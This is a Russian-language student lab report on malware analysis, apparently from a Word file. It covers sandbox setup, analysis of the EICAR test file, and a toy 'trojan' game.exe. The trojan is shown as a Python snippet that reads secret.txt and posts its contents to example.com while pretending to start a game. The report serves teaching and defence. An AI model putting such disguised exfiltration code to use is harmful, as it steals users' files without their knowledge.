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00" w:afterAutospacing="1" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="both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Теоретическая часть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1. Что такое вредоносное ПО (вирусы, трояны, вымогатели)? Принцип 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Вредоносное ПО (ВПО,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malware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— программы, созданные для нанесения ущерба, кражи данных или несанкционированного доступа.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Вирусы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заражают файлы, распространяются через исполняемые файлы.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Трояны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маскируются под легитимные программы, крадут данные или открывают бэкдоры.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Вымогатели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Ransomware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шифруют файлы и требуют выкуп.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Принципы анализа вредоносного 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Статический анализ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изучение кода без запуска (декомпиляция, поиск строк, сигнатур).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2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Динамический анализ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запуск в изолированной среде (песочнице) и мониторинг поведения.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3. Правила безопасности при исследовании ВПО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Использовать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изолированные среды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(виртуальные машины).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Отключать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интернет и общие папки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Запрещать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автозапуск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образцов.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3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Работать в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ограниченной учётной записи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480" w:before="48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1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0.7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Практические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Задача 1: Подготовка среды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Установить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Windows 10 на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VirtualBox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Установить инструменты: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4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-NG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(имитация сети)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4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Process Monitor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(мониторинг процессов)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4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(статический анализ)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4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Отключить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сеть в настройках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VirtualBox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480" w:before="48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2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0.7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Задача 2: Анализ EICAR-образца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Файл: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eicar.com (тестовый, не вредоносный).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1. Статический анализ в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5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Открыть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файл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→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найти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строку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 EICAR-STANDARD-ANTIVIRUS-TEST-FILE.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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Программа не выполняет вредоносных действий, только выводит текст.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Динамический анализ с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Запустить fakenet.exe -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 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→ запустить eicar.com.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6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Логи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Сетевых запросов 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480" w:before="48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3" name="_x0000_i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0.7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Задача 3: Анализ поведения EICAR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Process Monitor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установить фильтры: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Process Name = eicar.com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Operation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CreateFile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RegSetValue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7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Запустить eicar.com и проверить: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Создание файлов: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Изменение реестра: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7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Сетевые запросы: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Нет.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Безопасный тестовый файл.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480" w:before="48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4" name="_x0000_i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0.7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Задача 4: Исследование "трояна" (game.exe)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(Python-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аналог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python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Copy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Download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import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os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,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requests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if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os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path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exists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"C:\\secret.txt"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requests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post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"http://example.com"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,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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4078f2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">=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open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"secret.txt"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).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read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())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else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hd w:val="clear" w:color="auto" w:fill="fafafa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626a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">print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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="50a14f"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">"Game started!!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="383a42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t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color w:val="494949"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"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1.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Статический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анализ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Ghidra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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Найти строку example.com → обнаружить функцию чтения файлов.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Динамический анализ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ProcMon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9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Проверить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чтение secret.txt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и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подключение к example.com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Программа пытается отправить данные из secret.txt на удалённый сервер.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480" w:before="48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9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5" name="_x0000_i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952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0.7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Отчёт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1. Таблица результатов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tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders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46"/>
        <w:gridCol w:w="2239"/>
        <w:gridCol w:w="2155"/>
        <w:gridCol w:w="2505"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            </w:tcBorders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Образец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Создает файлы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Меняет реестр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  <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            </w:tcBorders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  <w:t xml:space="preserve">Сетевые запросы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eicar.com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Borders/>
            <w:tcMar>
              <w:left w:w="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game.exe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 (secret.txt)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Нет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Borders/>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="150" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="0" w:type="auto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Да (example.com)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r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind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2. Ответы на вопросы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Признаки вредоносного поведения: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Чтение конфиденциальных файлов (secret.txt).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Отправка данных на внешний сервер (example.com).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Почему EICAR безопасен?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Это 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тестовый файл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не выполняющий вредоносных действий.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Как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помогает?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Имитирует сеть, перехватывает запросы, не давая ВПО подключиться к реальным серверам.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Типы ВПО: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Вирусы, трояны, черви, руткиты,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ransomware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spyware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Цели анализа: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Понимание функционала, выявление угроз, разработка защиты.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Разница статического и динамического анализа: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Статический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Без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запуска (декомпиляция, строки).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Динамический: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С запуском (мониторинг поведения).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Инструменты статического анализа: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, IDA Pro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декомпиляция, поиск сигнатур.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Обфускация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во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вредоносах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Усложняет анализ (шифрование строк, запутывание кода).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Признаки ВПО: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Подозрительные строки (http://, secret.txt).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Изменение реестра, создание файлов.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Песочница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sandbox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Изолированная среда для безопасного запуска ВПО.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Обход антивирусов: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Полиморфизм, упаковка,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инжектирование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 легитимные процессы.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Инъекция кода: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Внедрение вредоносного кода в работающие процессы (DLL-инжекция).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Этапы динамического анализа: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Запуск → мониторинг (файлы, реестр, сеть) → анализ логов.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Данные статического анализа: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Импорты, строки, сигнатуры, алгоритмы.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Изучение поведения для защиты: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Помогает создавать сигнатуры,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патчить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уязвимости.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Сценарии использования ВПО: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Кража данных,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DDoS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шпионаж, вымогательство.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Обратная разработка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Reverse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 Engineering):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Анализ бинарного кода для восстановления логики.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Риски анализа в реальной среде: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Заражение системы, утечка данных.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Меры предосторожности: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Виртуализация, отключение сети, использование инструментов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Анализ для расследований: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Определение источника атаки, тактик злоумышленников.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0"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="6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Этические аспекты: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1"/>
          <w:numId w:val="10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Использовать знания только в легальных целях (белый хакинг).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100" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="both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Вывод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EICAR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безопасный тестовый файл.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Game.exe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– демонстрирует поведение трояна (кража данных).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Инструменты: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Ghidra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(статический анализ),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ProcMon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(динамический),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FakeNet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(сеть).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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="100" w:afterAutospacing="1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 xml:space="preserve">Безопасность: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 Виртуализация, изоляция, мониторинг.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2025-06-06T21:16:21Z</dcterms:modified>
</cp:coreProperties>
</file>